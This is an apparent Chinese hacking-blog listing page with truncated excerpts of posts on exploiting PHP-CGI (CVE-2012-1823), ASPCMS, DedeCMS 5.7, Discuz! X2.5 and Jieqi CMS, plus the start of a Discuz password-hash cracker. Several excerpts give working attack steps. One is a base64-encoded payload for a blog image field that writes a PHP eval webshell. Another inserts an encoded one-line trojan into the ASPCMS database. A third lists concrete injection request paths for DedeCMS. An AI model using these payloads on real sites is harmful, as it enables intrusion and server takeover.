CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战

国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ 粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。 另外关于RCE的PoC原文没...

- 阅读全文 -

最新的PHP补丁并不能修复漏洞

   星期三, 一個 PHP 远程代码执行漏洞被意外公开在网上, 引发了利用此漏洞可对大量网站实施入侵的恐慌. 该 bug 可以追溯到 2004 年, 在最近的 CTF 比赛中被暴露. ‘当 PHP 以 CGI 模式运行时 (如 Apache 的 mod_cgid), php-cgi 会接受处理一個查询字符串作为命令行参数以开启某些功能    如 -s, -d 或 -c 传递给 php-cgi, ...

- 阅读全文 -

ASPCMS数据库可插一句话!

aspcms主要是信息发布系统,影响版本为asp。   漏洞成因,在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入数据库。   数据库默认配置为asp.目录在/data/data.asp下。   利用方法,保证默认数据库路径末更改及可留言,就算不能留言,可构造,经测试,九成的末更改: 在留言的标题处插入:┼攠數畣整爠煥敵瑳∨≡┩愾   这样就往...

- 阅读全文 -

织梦5.7注入加上传漏洞

会员中心查询会员信息语句过滤不严,导致url可提交注入参数; 会员中心有上传动作过滤不严,导致上传漏洞 详细说明: ①注入漏洞。 这站 https://www.webshell.cc/ 首先访问“/data/admin/ver.txt”页面获取系统最后升级时间, 然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图...

- 阅读全文 -

DZ!2.5 后台拿 WebShell 方法!

直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 4.访问日志,论...

- 阅读全文 -

杰奇CMS 漏洞

杰奇CMS ( Jieqi CMS) 是一套以小说系统为主的CMS,目前的最新版本是1.7,在小说类的站中使用率还是比较高的,这几天花了点时间看了一下他的代码,觉得挺有意思的,跟大家分享一下。 整个系统核心代码是zend加密的,dezend之后看了一下。先从最几率最大的select型注入看起,但是发现所有地方GET过去的参数,最后都会带入\lib\database\database.php中组合S...

- 阅读全文 -

discuz 后台密码加密hash破解

discuz 密码大家公认的蛋疼 该程序采用碰撞破解 加载字典(各种库中提取的)   <?php error_reporting(0); if ($argc<2) { print_r(' ----------------------------------------------------------------+ Usage: php '.$argv[0].' hash ...

- 阅读全文 -